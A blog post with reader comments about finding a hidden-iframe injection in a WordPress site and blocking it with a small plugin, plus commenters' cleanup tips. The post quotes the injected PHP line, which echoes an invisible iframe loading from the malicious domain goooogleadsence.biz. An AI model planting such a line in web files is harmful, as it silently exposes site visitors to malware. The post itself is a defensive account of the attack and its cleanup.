Blocks the Annoying goooogleadsence.biz Iframe
Hey, in the middle of my work finishing the Smells Like Facebook Theme, I realize that somehow my blog always load something from http://goooogleadsence.biz/. The browser status bar always show “Connecting to http://goooogleadsence.biz/” every time I load my blog page. I thought it is my ads script. But after I check, it isn’t. Then scan blog directories and found some malicious script in some files like this
echo “<iframe src=\”?click=7B42BF\” width=1 height=1 style=\”visibility:hidden;position:absolute\”></iframe>”;
Feeling suspicious, I google about it. Then I find this post: http://www.diovo.com/2009/03/hidden-iframe-injection-attacks/. I finally know that the script was added somehow to my files by a virus. Yes, it is my own mistake. I often connect to my blog ftp to edit themes in a public computers. After I clean all the script from my blog directories and change my ftp password, the script always get back to the files. I don’t know why. I’m very afraid that Google will index my blog as a malicious site because of that script.
Then I got an idea. I made a very simple plugin that will end the execution of PHP script after the theme footer is loaded. So the malicious script will never be executed and the iframe will never shown in the blogpage. Of course, the plugin doesn’t remove the script, it just prevent the iframe for being shown. You’ll still need to remove the script from your files manually (or if you’ve found tool to do it). This plugin also useful in case the script get back to your files somehow after you removed them.
You can download the plugin here. It is still in beta version, so if you found some bugs, please report it here. Oh yes, you’ll need to make sure that your theme have a call to wp_footer() function right before </body> close tag.
PS: some of Joomla users have found the tool to remove the script, but.. it has a price, not free. Thanks God, I’m using Wordpress..
This means that the worm has infected your the machine which you are currently using for connecting to the server.
thank wordpress
I am also attached by this virus in my blog as well as RSS feed and it is not removing after the plugin. Please help !
Finally we made the removal of that virus script. That script find the googleabsence.biz iframe from your server and remove that. You can get that script from the below link.
http://joomlaextensions.co.in/
Nice post, Jib…
But I’m still waiting for “Smile Like Facebook” theme….
Once the exploit is placed, this has potential to propagate to client-side machines through any insecure browser (IE, Opera, and now Firefox from what we’ve been seeing).
Chrome appears to be the only browser capable of mitigating the issue for client-side machines at this time, as it shuts the session down immediately upon detecting the malicious code.
The best article regarding this issue is here:
http://www.softpanorama.org/Malware/Malicious_web/malicious_iframe_attack.shtml
A good solution to consider, if you have access to your server (though the server itself needs to have the rootkits removed) is here:
http://www.gotroot.com/tiki-read_article.php?articleId=278
If you’re on Windows hosting, or with a provider that’s not willing to admit to their servers becoming compromised (regardless of how it happened) — good luck trying to get any host to 1) own up and 2) take action.
So for now, regard filter as only a band-aid precaution to prevent other machines from becoming infected.
Now that I’ve cleared it, attacks have stopped. So you all might wanna check if your host has left it on in php.ini. If you can’t edit your php.ini file, just add “php_flag register_globals off” at the top of your root .htaccess file.
Cheers
Akash
This virus attack happens only if you have used FTP from infected system. The webhost system admin sent me log of FTP activity from others uploading files to my host account.
After I take this care, no infection is taking place.
kita sampe pindah hosting lho , gara gara iframe beginian
btw , comment nya kasih notify me dong biar tetep bisa folllow
thanks for the nice info & tools
makasih pluginnya juga. ditunggu kreasi selanjutnya..